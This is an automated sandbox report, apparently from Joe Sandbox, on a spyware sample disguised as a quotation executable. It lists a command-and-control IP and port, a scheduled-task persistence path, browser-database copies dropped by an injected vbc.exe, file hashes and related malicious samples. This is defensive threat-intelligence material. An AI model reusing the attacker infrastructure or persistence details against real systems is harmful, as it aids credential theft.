https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.222.58.90	unknown	Netherlands		51447	ROOTLAYERNETNL	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	648537
Start date and time: 20/06/202205:27:07	2022-06-20 05:27:07 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	QUOTATION062022.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	43
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@24/53@4/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 1.6% (good quality ratio 1.5%) Quality average: 67.1% Quality standard deviation: 19.1%
HCA Information:	Successful, ratio: 97% Number of executed functions: 113 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 104.26.12.31, 104.26.13.31, 172.67.75.172
Excluded domains from analysis (whitelisted): www.bing.com, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, arc.msn.com, ris.api.iris.microsoft.com, go.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
05:28:30	Task Scheduler	Run new task: Nafifas path: "C:\Users\user\AppData\Roaming\Data\Data.exe"
05:28:51	API Interceptor	234x Sleep call for process: vbc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.222.58.90	QUOTATION 061622.exe	Get hash	malicious	Browse	185.222.58.90:17910/
	SecuriteInfo.com.Variant.MSILHeracles.37401.28222.exe	Get hash	malicious	Browse	185.222.58.90:17910/
	RFQ - FYKS - 06052022.exe	Get hash	malicious	Browse	185.222.58.90:17910/
	MACHINE SPECIFICATIONS.exe	Get hash	malicious	Browse	185.222.58.90:17910/
	MACHINE SPECIFICATIONS.exe	Get hash	malicious	Browse	185.222.58.90:17910/

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ROOTLAYERNETNL	Sipari#U015f -16 0652022 _June 2022,pfd.exe	Get hash	malicious	Browse	185.222.57.197
	SecuriteInfo.com.W32.AIDetect.malware2.21664.exe	Get hash	malicious	Browse	185.222.57.197
	QUOTATION 061622.exe	Get hash	malicious	Browse	185.222.58.90
	vbc.exe	Get hash	malicious	Browse	185.222.57.197
	SOA.exe	Get hash	malicious	Browse	185.222.57.146
	0123987INMWN2987.js	Get hash	malicious	Browse	45.137.22.152
	L4aghbwCQr54nW4.exe	Get hash	malicious	Browse	45.137.22.152
	Order Enquiry.exe	Get hash	malicious	Browse	185.222.57.173
	Quotation.exe	Get hash	malicious	Browse	45.137.22.40
	CCMWZuN3YWHECys.exe	Get hash	malicious	Browse	45.137.22.152
	SecuriteInfo.com.Trojan005944781.27289.exe	Get hash	malicious	Browse	185.222.57.197
	vqalfhePHx.exe	Get hash	malicious	Browse	45.137.22.237
	PyS0mctVfI.exe	Get hash	malicious	Browse	45.137.22.237
	Yeni sipari#U015f _No.129099, pdf.exe	Get hash	malicious	Browse	185.222.57.197
	ldzOp71fAH.exe	Get hash	malicious	Browse	185.222.57.197
	INV198763.js	Get hash	malicious	Browse	45.137.22.152
	LR7AKSMQhc.exe	Get hash	malicious	Browse	45.137.22.237
	Quotation.exe	Get hash	malicious	Browse	45.137.22.40
	INVZ678765340.js	Get hash	malicious	Browse	45.137.22.72
	Bestellung -20162022 _June 2022,pdf.exe	Get hash	malicious	Browse	185.222.57.197

Process:	C:\Users\user\AppData\Roaming\Data\Data.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	520
Entropy (8bit):	5.345981753770044
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPk21rkvoDLI4MWuCOKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks29E4KnKDE4KhK3VZ9pKhk
MD5:	CB16F02E4CEFD4F305114A67B4865184
SHA1:	7A481FAE100B554EB754816608A7776954863CFF
SHA-256:	0428AA69397DC9399FEBFB4293F8FD06202C8A3C2E9B3F841EBA2DE87DB9FC25
SHA-512:	1F96226886924B2F33578AB5F2B1306A77925FB86AC05615565C3F4EF7D93DB40F9ADD05CDA7F5435DEF58D1FEA1A33473EDDDAFFB0AF8161E73BC7CDBEAEF47
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION062022.exe.log

Download File

Process:	C:\Users\user\Desktop\QUOTATION062022.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	520
Entropy (8bit):	5.345981753770044
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPk21rkvoDLI4MWuCOKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks29E4KnKDE4KhK3VZ9pKhk
MD5:	CB16F02E4CEFD4F305114A67B4865184
SHA1:	7A481FAE100B554EB754816608A7776954863CFF
SHA-256:	0428AA69397DC9399FEBFB4293F8FD06202C8A3C2E9B3F841EBA2DE87DB9FC25
SHA-512:	1F96226886924B2F33578AB5F2B1306A77925FB86AC05615565C3F4EF7D93DB40F9ADD05CDA7F5435DEF58D1FEA1A33473EDDDAFFB0AF8161E73BC7CDBEAEF47
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vbc.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2502
Entropy (8bit):	5.3347050065951125
Encrypted:	false
SSDEEP:	48:MOfHK5HKXAHKdHKBSTHaAHKzvRYHKhQnoPtHoxHImHKhBHKoHaHZHAHDJHjHKoLK:vq5qXAqdqslqzJYqhQnoPtIxHbqLqo6d
MD5:	44A99103902115000FEE31833EEF1EC7
SHA1:	8A5D9F44EEDDB720DA442547F396ED61378DC5CF
SHA-256:	E1CDCE73432C1A13E0C2C29AA9DD3282DC9C6CC07262AEFEFBC0BC0BF13A7039
SHA-512:	89C217C56022C88F94B813A81E83800B9D5D4779364E1E40D3C892100AEBAC9ACA75F9E767B6C003D88399A462830FE6973F7D611595ADFAAEBE8D39723A37F0
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,

C:\Users\user\AppData\Local\Temp\tmp151F.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1759.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp22C0.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp39BB.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4108.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6970840431455908
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
MD5:	00681D89EDDB6AD25E6F4BD2E66C61C6
SHA1:	14B2FBFB460816155190377BBC66AB5D2A15F7AB
SHA-256:	8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
SHA-512:	159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4EA7.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp53EE.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5452.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5557.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp605F.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp633B.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6970840431455908
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
MD5:	00681D89EDDB6AD25E6F4BD2E66C61C6
SHA1:	14B2FBFB460816155190377BBC66AB5D2A15F7AB
SHA-256:	8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
SHA-512:	159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp65BB.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6970840431455908
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
MD5:	00681D89EDDB6AD25E6F4BD2E66C61C6
SHA1:	14B2FBFB460816155190377BBC66AB5D2A15F7AB
SHA-256:	8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
SHA-512:	159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp69EB.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7267.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp772C.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp8294.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp8397.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
